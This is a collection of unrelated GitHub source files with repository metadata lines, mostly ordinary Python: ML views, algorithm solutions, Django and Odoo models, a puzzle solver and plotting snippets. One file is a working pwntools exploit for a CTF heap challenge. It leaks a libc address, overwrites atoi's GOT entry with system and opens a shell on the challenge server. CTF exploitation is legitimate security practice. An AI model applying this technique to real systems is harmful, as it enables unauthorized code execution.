[ 0. , 0. , 0. , 0. , 0. ]]),
(0.0, 0.5): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0. , 0. , 0. , 0. , 0. ]]),
(0.0, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0. , 0. , 0. , 0. , 0. ]]),
(0.5, 0.5): np.array([[-1. , -0.5 , 0. , 0.5 , 1. ],
[ 0. , 0.16769, 0.25 , 0.3354 , 0.5 ]]),
(0.5, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 0.5, 0.5, 0.5, 0.5, 0.5]]),
(1.0, 1.0): np.array([[-1. , -0.5, 0. , 0.5, 1. ],
[ 1. , 1. , 1. , 1. , 1. ]])
}
for c, eZ in expected_Z.items():
assert np.isclose(Z[c], eZ).all().all()
| LucaMingarelli/bindata | bindata/tests/test_all.py | test_all.py | py | 6,329 | python | en | code | 2 | github-code | 90 |
2703654188 | from django.shortcuts import render
import numpy as np
import pandas as pd
# our home page view
def home(request):
return render(request, 'index.html')
# custom method for generating predictions
def getPredictions(age,preg,glu,bp,st,ins,bmi,dpf):
import pickle
n1 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Age_Encode.sav", "rb"))
age=n1.transform(np.array(age).reshape(1,-1))
n2 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Pregancies_Encode.sav", "rb"))
preg=n1.transform(np.array(preg).reshape(1,-1))
n3 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Glucose_Encode.sav", "rb"))
glu=n3.transform(np.array(glu).reshape(1,-1))
n4 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\BP_Encode.sav", "rb"))
bp=n4.transform(np.array(bp).reshape(1,-1))
n5 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\ST_Encode.sav", "rb"))
st=n5.transform(np.array(st).reshape(1,-1))
n6 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\Insulin_Encode.sav", "rb"))
ins=n6.transform(np.array(ins).reshape(1,-1))
n7 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\BMI_Encode.sav", "rb"))
bmi=n7.transform(np.array(bmi).reshape(1,-1))
n8 = pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\DPF_Encode.sav", "rb"))
dpf=n8.transform(np.array(dpf).reshape(1,-1))
l1=[age,preg,glu,bp,st,ins,bmi,dpf]
l1=np.array(l1)
model=pickle.load(open("C:\\Users\\Arshan\\Desktop\\diabetes\\Diabetes\\Diabetes\\RandFmodel.pkl", "rb"))
l1=l1.reshape(1,-1)
prediction=model.predict(l1)
if prediction == 0:
return "Not Diabetic"
elif prediction == 1:
return "Diabetic"
else:
return "error"
# our result page view
def result(request):
age=int(request.GET['age'])
preg=int(request.GET['preg'])
glu=int(request.GET['glu'])
bp=int(request.GET['bp'])
st=int(request.GET['st'])
ins=int(request.GET['ins'])
bmi=float(request.GET['bmi'])
dpf=float(request.GET['dpf'])
result = getPredictions(age,preg,glu,bp,st,ins,bmi,dpf)
return render(request, 'index.html', {'result':result})
| Aliyan2002/Diabetes | Diabetes/views.py | views.py | py | 2,412 | python | en | code | 0 | github-code | 90 |
33673702277 | # https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/
# 思路:几乎与二叉树的层序优先遍历一模一样
from queue import Queue
from typing import List
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
class Solution:
def levelOrder(self, root: 'Node') -> List[List[int]]:
"""
:type root: Node
:rtype: List[List[int]]
"""
ans = []
q = Queue()
q.put((root, 1))
while not q.empty():
node, lev = q.get()
if not node:
continue
if lev > len(ans):
ans.append([])
ans[-1].append(node.val)
for n in node.children:
q.put((n, lev + 1))
return ans
| algorithm003/algorithm | Week_03/id_40/leetcode_429_40.py | leetcode_429_40.py | py | 814 | python | en | code | 17 | github-code | 90 |
21029806430 | from pwn import *
import time
import sys
def easy_heap(DEBUG):
t = 0.3
def Add(index, name):
r.sendline("1")
r.recvuntil("Index: ")
r.sendline(str(index))
r.recvuntil("Input this name: ")
r.send(name)
time.sleep(t)
res = r.recvuntil("Your choice:")
return res
def View(idx):
r.sendline("4")
r.recvuntil("Index: ")
r.sendline(str(idx))
res = r.recvuntil("Done!")
r.recvuntil("Your choice:")
return res
def Delete(idx):
r.sendline("3")
r.recvuntil("Index: ")
r.sendline(str(idx))
res = r.recvuntil("Your choice:")
return res
def Edit(idx, name):
r.sendline("2")
r.recvuntil("Index: ")
r.sendline(str(idx))
r.recvuntil("Input new name: ")
r.send(name)
time.sleep(t)
res = r.recvuntil("Your choice:")
return res
def Exit():
r.sendline("5")
if DEBUG=="1":
t = 0.005
r = process("./easy_heap")
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
raw_input("debug?")
elif DEBUG=="2":
t = 0.01
env = {
'LD_PRELOAD': './easyheap_libc.so.6'
}
r = process("./easy_heap",env=env)
libc = ELF('./easyheap_libc.so.6')
raw_input("debug?")
elif DEBUG=="3":
offset_main_arena = 0x3c3af0
libc = ELF('./easyheap_libc.so.6')
HOST = 'easyheap.acebear.site'
PORT = 3002
r = remote(HOST,PORT)
free_got = 0x804B018
atoi_got = 0x0804B038
stdout = 0x0804B084
NAME = p32(atoi_got) # 0x0804B0E0
AGE = 0x40
r.recvuntil("Give me your name: ")
r.sendline(NAME)
r.recvuntil("Your age: ")
r.sendline(str(AGE))
r.recvuntil("Your choice: ")
idx = -2147483632 # idx < 9, DWORD PTR [idx*4+0x0804B0A0] == 0x0804B0E0 (NAME)
# leak atoi_got
res = View(idx)
atoi_got = u32(res.split(" is: ")[1][:4])
baselibc = atoi_got - libc.symbols['atoi']
system = baselibc + libc.symbols['system']
str_bin_sh = baselibc+next(libc.search("/bin/sh"))
log.info('atoi_got: %#x' % atoi_got)
log.info('baselibc: %#x' % baselibc)
log.info('system: %#x' % system)
log.info('str_bin_sh: %#x' % str_bin_sh)
# overwrite atoi_got by system address
Edit(idx, p32(system))
r.sendline("/bin/sh")
r.interactive()
easy_heap(sys.argv[1])
# AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u} | phieulang1993/ctf-writeups | 2018/AceBearSecurityContest/pwn/easy_heap/easy_heap.py | easy_heap.py | py | 2,243 | python | en | code | 19 | github-code | 90 |
73820388777 | class Solution:
def binaryGap(self, N: int) -> int:
s = bin(N)[2:]
result = 0
pre = -1
for idx, c in enumerate(s):
if c == '1':
if pre != -1:
result = max(idx - pre, result)
pre = idx
return result
| HarrrrryLi/LeetCode | 868. Binary Gap/Python 3/solution.py | solution.py | py | 309 | python | en | code | 0 | github-code | 90 |
38924219131 | # You are given K eggs, and you have access to a building with N floors from 1 to N.
# Each egg is identical in function, and if an egg breaks, you cannot drop it again.
# You know that there exists a floor F with 0 <= F <= N such that any egg dropped at
# a floor higher than F will break, and any egg dropped at or below floor F will not break.
# Each move, you may take an egg (if you have an unbroken one) and drop it from any
# floor X (with 1 <= X <= N).
# Your goal is to know with certainty what the value of F is.
# What is the minimum number of moves that you need to know with certainty what F is,
# regardless of the initial value of F?
# Example 1:
# Input: K = 1, N = 2
# Output: 2
# Explanation:
# Drop the egg from floor 1. If it breaks, we know with certainty that F = 0.
# Otherwise, drop the egg from floor 2. If it breaks, we know with certainty that F = 1.
# If it didn't break, then we know with certainty F = 2.
# Hence, we needed 2 moves in the worst case to know what F is with certainty.
# Example 2:
# Input: K = 2, N = 6
# Output: 3
# Example 3:
# Input: K = 3, N = 14
# Output: 4
# Explanation :
# Drop from all floors ( recursion guess approach, try everything )
# From all floors we "max" the recursion call since we want the worst case or the case
# that reaches the base case and not a case where we were lucky (drop from first floor).
# We need a solution that COVERS ALL FLOORS ( a.k.a reaches the base case) and works in
# the given scenario perfectly, no matter where the threshold floor is.
# Minimum tries means MINIMUM wherever the threshold floor is, that is why maximum is
# taken from break vs not break.
# But min from all tries since we want the call which took minimum tries to reach the base case.
from sys import maxsize
def eggDrop(e, f):
if M[e][f] != None:
return M[e][f]
minMoves = maxsize
if e == 1 or f <= 1:
minMoves = f
else:
for k in range(1, f+1):
moves = 1 + max(eggDrop(e, f-k), eggDrop(e-1, k-1))
minMoves = min(minMoves, moves)
M[e][f] = minMoves
return minMoves
def make2DMemory(n, m):
global M
M = [[None for i in range(m+1)] for j in range(n+1)]
T = int(input())
for _ in range(T):
egg = int(input())
floor = int(input())
make2DMemory(egg, floor)
print(eggDrop(egg, floor))
# 3
# 1
# 2
# 2
# 6
# 3
# 14
| AniruddhaSadhukhan/Dynamic-Programming | D_Matrix Chain Multiplication/5_Egg Dropping Problem.py | 5_Egg Dropping Problem.py | py | 2,395 | python | en | code | 0 | github-code | 90 |
36154742924 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 10:25:32 2020
@author: sandipan
"""
import snap
import json
G = snap.LoadEdgeList(snap.PUNGraph, "facebook_combined.txt", 0, 1)
#Closeness
def Closness():
cc=[] #cc stores the Closeness Centrality for each node in the form of a pair
for i in G.Nodes():
NIdToDistH = snap.TIntH()
tot=0
shortestPath = snap.GetShortPath(G, i.GetId(), NIdToDistH)
for j in NIdToDistH:
tot+=NIdToDistH[j] #tot is the sum of distance of every other node from node i
cc.append([i.GetId(),(G.GetNodes()-1)/tot])
cc.sort(key=lambda x:x[1])
cc.reverse()
f=open("./centralities/closeness.txt","w")
for item in cc:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #Saving the list cc in the file in readable manner
f.close()
with open("cc.txt", "w") as fp: #Saving the list cc
json.dump(cc, fp)
def init(A,val):
A.clear()
for i in G.Nodes():
if val==-99:
A[i.GetId()]=[] #This function initializes a dictionary to the given value
else :
A[i.GetId()]=val #-99 indicates initialising an empty list for each key of the dict
return A
#Betweeness Centrality using Brandes Algorithm
def Betweenness():
d=dict()
sig=dict() #d stores the distance of every node from the given node
P=dict() #sig is the sigma , Cb stores the betweenness Centrality
Cb=dict()
delta=dict()
Cb=init(Cb,0)
for Nid in G.Nodes():
s=Nid.GetId()
P=init(P,-99)
sig=init(sig,0)
sig[s]=1
d=init(d,-1)
d[s]=0
S=[]
Q=[]
Q.append(s)
while (len(Q)!=0):
v=Q.pop(0)
S.append(v)
for w in G.GetNI(v).GetOutEdges():
if(d[w]<0):
Q.append(w)
d[w]=d[v]+1
if(d[w]==d[v]+1):
sig[w]=sig[w]+sig[v]
P[w].append(v)
delta=init(delta,0)
while (len(S)!=0):
w=S.pop()
for v in P[w]:
delta[v]=delta[v]+(sig[v]/sig[w])*(1+delta[w])
if(w!=s):
Cb[w]=Cb[w]+delta[w]
bc=[] #bc stores the betweenness centrality for each node
n=G.GetNodes()
x=2/((n-1)*(n-2))
for Nid in G.Nodes():
s=Nid.GetId()
Cb[s]=Cb[s]*x
bc.append([s,Cb[s]])
bc.sort(key=lambda x:x[1])
bc.reverse()
f=open("./centralities/betweenness.txt","w")
for item in bc:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #Saving the bc list in a text file
f.close()
with open("bc.txt", "w") as fp:
json.dump(bc, fp)
#pagerank
def finddeg(u):
c=0
for v in G.GetNI(u).GetOutEdges(): #This functions finds the outdegree of a node u
c+=1
return c
def returnSum(myDict):
s = 0
for i in myDict:
s = s + myDict[i] #Finds the sum of values in a dictionary
return s
def Pagerank():
d=dict()
cnt=0
for i in G.Nodes():
no=i.GetId()
if( no%4==0): #cnt is the total number of nodes with id%4==0
cnt+=1
for i in G.Nodes():
no=i.GetId()
if( no%4==0):
d[no]=1/cnt # biasing the preference vector
else:
d[no]=0
PR=dict()
temp=dict()
alpha=0.8
e=1e-6
itr=0
for i in G.Nodes():
u=i.GetId()
PR[u]=d[u]
while(itr<=3):
temp.clear()
temp=PR.copy()
for i in G.Nodes():
u=i.GetId()
t=0
for v in G.GetNI(u).GetOutEdges():
t+=temp[v]/finddeg(v)
temp[u]=alpha*t+(1-alpha)*d[u]
f=1.0/returnSum(temp)
for k in temp:
temp[k] = temp[k]*f
PR.clear()
PR=temp.copy()
itr+=1
pr=[] # pr stores the pagerank of each nodes
for Nid in G.Nodes():
s=Nid.GetId()
pr.append([s,PR[s]])
pr.sort(key=lambda x:x[1])
pr.reverse()
f=open("./centralities/pagerank.txt","w")
for item in pr:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #saving the pr list in a text file
f.close()
with open("pr.txt", "w") as fp:
json.dump(pr, fp)
Closness()
Betweenness()
Pagerank()
| SandipanHaldar/Social-Computing- | 18ME10050 (2)/18ME10050/gen_centrality.py | gen_centrality.py | py | 5,150 | python | en | code | 0 | github-code | 90 |
3234133029 | import subprocess
import os
from os import path
import shutil
import signal
import sys
import random
import numpy as np
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from util import benchmark, options
def generate(num_courses, num_stu, max_core, max_interests):
lec_types = [
["MonAM", "WedAM"],
["MonAM", "WedAM", "FriPM"],
["MonPM", "WedPM"],
["TueAM", "ThuAM"],
["TuePM", "TuePM"]
]
courses = []
students = []
# generate courses
for i in range(num_courses):
courses.append(lec_types[np.random.randint(len(lec_types))])
# generate students cores and interests
for _ in range(num_stu):
# generate cores
cores = []
tmp = list(range(num_courses))
np.random.shuffle(tmp)
t = set()
for i in range(np.random.randint(max_core+1)):
found = False
for c in tmp[i:]:
if set(courses[c]) & t == set():
found = True
cores.append(c)
t = t | set(courses[c])
break
if not found:
break
# generate interests
np.random.shuffle(tmp)
if len(cores) > 1:
interests = [cores[np.random.randint(len(cores))]]
else:
interests = []
for c in tmp:
if set(courses[c]) & t == set():
interests.append(c)
break
for i in range(np.random.randint(max_interests)):
interests.append(tmp[i+1])
if len(cores) > 0:
cores = " + ".join(["C" + str(i) for i in cores])
else:
cores = "none"
interests = " + ".join(["C" + str(i) for i in interests])
students.append((cores, interests))
courses = list(map(lambda e: " + ".join(["C" + str(e[0]) + " -> " + l for l in e[1]]), enumerate(courses)))
courses_str = " +\n ".join(courses)
student_str = "\n".join([
f"one sig S{i} extends Student {{}} {{\n core = {students[i][0]}\n interests = {students[i][1]}\n}}"
for i in range(len(students))
])
als = f"""
abstract sig Day {{}}
one sig Mon, Tue, Wed, Thu, Fri extends Day {{}}
abstract sig Time {{}}
one sig AM, PM extends Time {{}}
abstract sig Course {{
lectures: set Lecture
}}
one sig {",".join(["C" + str(i) for i in range(num_courses)])} extends Course {{}}
fact {{
lectures = {courses_str}
}}
abstract sig Lecture {{
day: one Day,
time: one Time
}}
one sig MonAM, MonPM, TueAM, TuePM, WedAM, WedPM,
ThuAM, ThuPM, FriAM, FriPM extends Lecture {{}}
fact {{
day = MonAM -> Mon + MonPM -> Mon +
TueAM -> Tue +TuePM -> Tue +
WedAM -> Wed + WedPM -> Wed +
ThuAM -> Thu + ThuPM -> Thu +
FriAM -> Fri + FriPM -> Fri
time = MonAM -> AM + MonPM -> PM +
TueAM -> AM +TuePM -> PM +
WedAM -> AM + WedPM -> PM +
ThuAM -> AM + ThuPM -> PM +
FriAM -> AM + FriPM -> PM
}}
abstract sig Student {{
core: set Course,
interests: set Course,
courses: set Course
}}
{student_str}
pred conflict[c1, c2: Course] {{
some l1, l2: Lecture {{
l1 in c1.lectures
l2 in c2.lectures
l1.day = l2.day
l1.time = l2.time
}}
}}
pred validSchedule[courses: Student -> Course] {{
all stu: Student {{
#stu.courses > 2
stu.core in stu.courses
all disj c1, c2: stu.courses | not conflict[c1, c2]
}}
}}
"""
sat = als + "run AnySchedule {\n validSchedule[courses]\n all stu: Student | some stu.interests & stu.courses\n}"
maxsat = als + "run MaxInterests1 {\n validSchedule[courses]\n all stu: Student | maxsome stu.interests & stu.courses\n}"
return sat, maxsat
def run(outpath, run_sat=False, run_maxsat_one=False, run_maxsat_all=False, run_maxsat_part=False,
run_maxsat_part_auto=False, timeout=180, repeat=5):
max_core = 3
max_interests = 6
params = [
(30, 40),
(40, 50),
(50, 60),
(60, 70),
(70, 80),
(80, 90),
(90, 100)
]
problems = []
maxsat_files = []
sat_files = []
for num_courses, num_stu in params:
problem = f"{num_courses}_{num_stu}_{max_core}_{max_interests}"
problems.append(problem)
sat, maxsat = generate(num_courses, num_stu, max_core, max_interests)
sat_filename = path.join(outpath, f"sat_{problem}.als")
sat_files.append(sat_filename)
with open(sat_filename, "w") as f:
f.write(sat)
maxsat_filename = path.join(outpath, f"maxsat_{problem}.als")
maxsat_files.append(maxsat_filename)
with open(maxsat_filename, "w") as f:
f.write(maxsat)
sat_files = sat_files if run_sat else None
benchmark(problems, sat_files, maxsat_files, run_maxsat_one, run_maxsat_all,
run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
def run_models(modelpath, run_sat=False, run_maxsat_one=False, run_maxsat_all=False, run_maxsat_part=False,
run_maxsat_part_auto=False, timeout=180, repeat=5):
models = filter(lambda x: x.startswith("maxsat") and x.endswith(".als"), os.listdir(modelpath))
problems = []
maxsat_files = []
sat_files = []
for m in models:
problems.append(m[len("maxsat_"):-len(".als")])
maxsat_files.append(path.join(modelpath, m))
sat_files.append(path.join(modelpath, m.replace("maxsat", "sat")))
sat_files = sat_files if run_sat else None
benchmark(problems, sat_files, maxsat_files, run_maxsat_one, run_maxsat_all,
run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
if __name__ == "__main__":
run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat, model, from_file = options()
if model is None:
outpath = path.join(os.getcwd(), "out")
if path.exists(outpath):
shutil.rmtree(outpath)
os.mkdir(outpath)
run(outpath, run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
else:
run_models(model, run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
| cmu-soda/alloy-maxsat-benchmark | scripts/course/benchmark.py | benchmark.py | py | 5,850 | python | en | code | 0 | github-code | 90 |
20137377485 | from odoo import api, fields, models
class BankStatementBalancePrint(models.TransientModel):
_name = 'bank.statement.balance.print'
_description = 'Bank Statement Balances Report'
journal_ids = fields.Many2many(
comodel_name='account.journal',
string='Financial Journal(s)',
domain=[('type', '=', 'bank')],
help="Select here the Financial Journal(s) you want to include "
"in your Bank Statement Balances Report.")
date_balance = fields.Date(
string='Date', required=True, default=fields.Datetime.now)
@api.multi
def balance_print(self):
data = {
'journal_ids': self.journal_ids.ids,
'date_balance': self.date_balance,
}
return self.env.ref(
'account_bank_statement_advanced.statement_balance_report_action'
).report_action(self, data=data)
| luc-demeyer/noviat-apps | account_bank_statement_advanced/wizard/bank_statement_balance_print.py | bank_statement_balance_print.py | py | 890 | python | en | code | 20 | github-code | 90 |
18571996549 | import sys
def main():
input = sys.stdin.readline
N,M=map(int, input().split())
G=[[] for _ in range(N)]
inn=[0]*N
for _ in range(M):
l,r,d=map(int, input().split())
l,r=l-1,r-1
G[l].append((r, d))
inn[r] += 1
ds = [-1] * N
for i in range(N):
if inn[i]: continue
ds[i] = 0
stk = [(i, 0)]
while stk:
v, d = stk.pop()
for to, dt in G[v]:
if ds[to] != -1:
if ds[to] != d+dt:
print('No')
return
continue
ds[to] = d+dt
stk.append((to, d+dt))
if any([d == -1 for d in ds]):
print('No')
return
print('Yes')
if __name__ == '__main__':
main() | Aasthaengg/IBMdataset | Python_codes/p03450/s236120698.py | s236120698.py | py | 816 | python | en | code | 0 | github-code | 90 |
24017207374 | import flaskr
import model
import ricochet
import json
from flaskr.db import get_db
app = flaskr.create_app()
with app.app_context():
cursor = get_db().cursor()
row = cursor.execute("SELECT * from game where id=2").fetchone()
game = row[7]
gamejson = json.loads(game)
playerstate = gamejson['playerState']
wallsH = gamejson['wallHorizontal']
wallsV = gamejson['wallVerticle']
goal = gamejson['goal']
print(playerstate)
newplayerstate = list()
for player in playerstate:
top = player['top']
left = player['left']
if player['colorSignifier'] == 'blue':
color = 'B'
elif player['colorSignifier'] == 'red':
color = 'R'
elif player['colorSignifier'] == 'yellow':
color = 'Y'
else:
color = 'G'
position = top * 16 + left
newplayerstate.append({
'position': int(position),
'color': color
})
result = ['' for x in range(256)]
wallsV = wallsV[1:]
for wall in wallsH:
top = wall['top']
left = wall['left']
if top >= 16:
top = top - 1
position = top * 16 + left
if left < 16:
result[int(position)] += 'S'
else:
position = top * 16 + left
if left < 16:
result[int(position)] += 'N'
if top != 0:
result[int(position) - 16] += 'S'
for wall in wallsV:
top = wall['top']
top = top
left = wall['left']
if left >= 16:
left = left - 1
position = top * 16 + left
if top < 16:
result[int(position)] += 'E'
else:
if top < 16:
position = top * 16 + left
result[int(position)] += 'W'
if left != 0:
result[int(position) - 1] += 'E'
grid = result
tokenlist = ['BH','GH','RH','YH']
colors = list()
robots = list()
for player in newplayerstate:
robots.append(player['position'])
colors.append(player['color'])
goaltop = goal['top']
goalleft = goal['left']
gridlist = list()
placeholder = grid[int(goaltop * 16 + goalleft)]
paths = list()
for x, token in enumerate(tokenlist):
grid1 = grid
grid1[int(goaltop * 16 + goalleft)] = placeholder + token
for x, space in enumerate(grid1):
if space == '':
grid1[x] = 'X'
print('answers')
print(grid1)
print(robots)
print(colors)
print(token)
paths.append(ricochet.search(model.Game(grid=grid1, robots=robots, col=colors, token=token)))
import json
jsoning = json.loads(json.dumps(paths, indent=4))
newpaths = list()
for x, path in enumerate(jsoning):
for y, pathy in enumerate(path):
if pathy[0] == 'G':
newpaths.append('B' + pathy[1])
elif pathy[0] == 'B':
newpaths.append('R' + pathy[1])
elif pathy[0] == 'R':
newpaths.append('G' + pathy[1])
else:
newpaths.append('Y' + pathy[1])
newpaths.append('NEXT')
print(newpaths)
| Kwazinator/robotsevolved | Solver/solver.py | solver.py | py | 2,925 | python | en | code | 7 | github-code | 90 |
72952291498 | import numpy as np
import matplotlib.pyplot as plt
numpy_str = np.linspace(0,10,20) #random 20 tane float sayı oluştur 0 dan 10 a kadar
print(numpy_str)
numpy_str1 = numpy_str ** 3
my_figure = plt.figure()
figureAxes = my_figure.add_axes([0.2,0.2,0.4,0.4]) #ilk iki değer x ekseni ve y ekseninin etkiliyor, son iki değer ise büyüklüğünü etkiliyor
figureAxes.plot(numpy_str,numpy_str1,"g")
figureAxes.set_xlabel("X ekseni")
figureAxes.set_ylabel("Y ekseni")
figureAxes.set_title("Graph")
plt.show() | berkayberatsonmez/Matplotlib | Matplotlib/plt_figure.py | plt_figure.py | py | 526 | python | tr | code | 0 | github-code | 90 |
22356401525 | from django.db import models
from personas.models import Persona
from productos.models import Producto
import datetime
from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
# Create your models here.
class Venta(models.Model):
cliente = models.ForeignKey(Persona, on_delete=models.CASCADE)
fecha = models.DateTimeField(blank=True)
estado = models.BooleanField(default = True)
def __str__(self):
return str(self.fecha)
class Venta_detalle(models.Model):
venta = models.ForeignKey(Venta, on_delete=models.CASCADE)
producto = models.ForeignKey(Producto, on_delete=models.CASCADE)
cantidad = models.IntegerField(default = 1)
precio = models.DecimalField( max_digits=5, decimal_places=2, default = 0)
estado = models.BooleanField(default = True)
def __str__(self):
return str(self.cantidad)
@receiver(post_save, sender=Venta_detalle)
def save_venta_detalle(sender, instance, **kwargs):
prod = Producto.objects.get(id=instance.producto.id)
prod.stock -=instance.cantidad
prod.save()
print('stock actualizado=' + str(prod.stock))
@receiver(post_delete, sender=Venta_detalle)
def delete_venta_detalle(sender, instance, **kwargs):
prod = Producto.objects.get(id=instance.producto.id)
prod.stock +=instance.cantidad
prod.save()
print('stock actualizado=' + str(prod.stock)) | juksonvillegas/apptca-backend | ventas/models.py | models.py | py | 1,397 | python | en | code | 0 | github-code | 90 |
5721409167 | import sys
for i in sys.stdin:
totalNumber = i
dictTotal = {}
numbers = sys.stdin.readline().strip().split(' ')
for j in numbers:
if dictTotal.get(list(j)[-1]):
dictTotal.get(list(j)[-1]).append(int(j))
dictTotal.update(
{list(j)[-1]: dictTotal.get(list(j)[-1])})
else:
dictTotal.update({list(j)[-1]: [int(j)]})
for k in dictTotal.keys():
dictTotal[k] = sorted(dictTotal.get(k), reverse=True)
sortKeys = sorted(dictTotal.keys())
result = []
for m in sortKeys:
result += [str(i) for i in dictTotal[m]]
print(' '.join(result))
| lalalalaluk/python-zerojudge-practice | a225明明愛排列.py | a225明明愛排列.py | py | 650 | python | en | code | 0 | github-code | 90 |
2449798885 | from django.urls import path
from . import views
app_name='users'
urlpatterns = [
path('create_event', views.create_event, name='create_event'),
path('display_events',views.display_events, name='display_events'),
path('add_event', views.add_event, name='add_event'),
path('hosted_events',views.hosted_events, name='hosted_events'),
path('report_user/<int:id>/',views.report_user,name='report_user'),
path('createdevents',views.createdevents,name='createdevents'),
path('joinedevents',views.joinedevents,name='joinedevents'),
path('<int:eventid>/getregistrations',views.getregistrations,name='getregistrations'),
path('dashboard',views.dashboard,name='dashboard')
] | sampan-s-nayak/event-publishing-portal | event_management/user/urls.py | urls.py | py | 706 | python | en | code | 3 | github-code | 90 |
37379196108 | from django.utils import dateparse
from django.db.models import Avg, Count, Max
from rest_framework import views
from rest_framework.response import Response
from rest_framework import authentication
from rest_framework import exceptions
from sga.models import Promotion, AgeGroup, AgeGroupPromotion, Area, AreaPromotion
from sga.rest.permissions import AdminWritePermissions
class PromotionFilterView(views.APIView):
authentication_classes = (authentication.TokenAuthentication,
authentication.SessionAuthentication,
authentication.BasicAuthentication)
permission_classes = (AdminWritePermissions,)
def get(self, request):
if not request.user.is_authenticated():
raise exceptions.NotAuthenticated()
self.user = request.user
self.params = request.query_params
return Response(self.process_promotions())
def process_promotions(self):
json = {}
promotions = Promotion.objects.all()
age = self.params.get('age')
promotion_type = self.params.get('promotion_type')
area = self.params.get('area')
if promotion_type:
promotions = promotions.filter(promotion_type=promotion_type)
for area_promotion in AreaPromotion.objects.filter(area=area):
for age_group_promotion in AgeGroupPromotion.objects.filter(age_group__age_min__lte=age).filter(age_group__age_max__gte=age):
if age_group_promotion.promotion.id == area_promotion.promotion.id:
promotion = promotions.get(id=area_promotion.promotion.id)
print(promotion.name)
return json
def process_stores(self, stats):
json_data = []
parent = self.params.get('store')
for store in Store.objects.filter(parent=parent):
area_max = stats.filter(area__store=store).aggregate(Max('area'))['area__max']
area = Area.objects.get(id=area_max)
json = {
'store': {
'id': store.id,
'name': store.name,
'best_area' : {'id': area.id, 'name': area.name},
'nr_of_devices': stats.filter(area__store=store).annotate(Count('device', distinct=True)).count(),
'best_day': self.get_max_day(stats.filter(area__store=store)),
'best_age': self.get_best_age(stats.filter(area__store=store))
}
}
json_data.append(json)
return json_data
| ruben-dossantos/sga | server/sga/rest/promotion_filter.py | promotion_filter.py | py | 2,567 | python | en | code | 0 | github-code | 90 |
24648141570 | # -*- coding: utf-8 -*-
import random
import urllib
import datetime
from dateutil.relativedelta import relativedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.contrib.humanize.templatetags.humanize import intcomma
from submodule.horizontalpartitioning import transaction_commit_on_success_hp
from submodule.gsocial.http import HttpResponseOpensocialRedirect
from submodule.gsocial.set_container import containerdata
from submodule.ajax.handler import AjaxHandler
from submodule.gsocial import ActionRecord
from submodule.gamelog.models import DailyAccessLog
from submodule.gsocial.utils.achievement import Achievement
from module.player.api import (get_player_by_osuserid, get_fleshman)
from module.player.decorators import require_player
from module.playercard.battle_api import (
get_player_attack_front_list,
get_player_defense_front_list
)
from module.misc.view_utils import render_swf
from module.common.deviceenvironment.device_environment import media_url
from module.common.flash_manager import PromotionFlashManager
from module.playercarddeck.api import get_deck_all
from module.friend.api import get_friend_player_count
from module.serialcampaign.api import get_publish_serialcampaign_list
from module import i18n as T
from module.common.authdevice import is_auth_device_and_just_authorized_now
from module.playerbattleresult.api import get_battle_history_list
from module.bless.api import get_bless_histories
from module.notification.api import get_notification_list
from module.loginbonus.models import LoginStamp
from module.loginbonus.api import get_valid_loginbonus_list, get_extra_or_active_login_stamp
from module.campaign.regist_api import get_active_regist_campaign
from module.campaign.api import get_active_buildup_campaign
from module.playercampaign.api import acquire_regist_campaign
from module.playerloginbonus.api import acquire_login_bonus, acquire_login_stamp, get_latest_login_stamp_history
from module.playerprofile.api import get_profile_comment
from module.playeradventbox.api import get_latest_advent_box_history, acquire_advent_box
from module.playeradventbox.models import PlayerAdventBoxRewardHistory
from module.adventbox.api import get_active_advent_box
from module.bannerarrange.api import get_banner_tag, get_active_arrange_list
from module.bannerarrange.models import ArrangeBase
from module.card.models import DummyCard
from gachamodule.playerfgacha.api import player_one_time_per_day_gashapon
from module.actionlog.api import log_do_growth
from module.information.models import Information as informations
from module.information.models import Information
from module.actionlog.api import log_do_view_page_mypage
from module.battle.api import BATTLE_SIDE_ATTACK, BATTLE_SIDE_DEFENSE, get_battle_member_list
from module.invitation.api import callback_invitation_end_player_tutorial
from module.shop.api import get_limited_shop_list
from module.common import get_cache_limit_of_day
from module.playergashapon.api import player_time_free_gashapon
from module.gashapon.api import get_active_gashapon_stamp
from module.imas_guild.api_pet import get_current_pet
from module.continuancebonus.api import check_continuance_bonus
from module.comebackbonus.api import get_valid_comebackbonus
from module.playercomebackbonus.api import acquire_comebackbonus
from module.continuationcampaign.api import get_valid_continuationcampaign
from module.playercontinuationcampaign.api import check_and_do_continuationcampaign
from module.compensation.api import get_player_compensations
from eventmodule.ecommon.api import get_opening_events, get_ending_events
from eventmodule import Event
from module.navimessage.api import get_navi_message
from eventmodule.ecommon.navi_message import select_navi_message
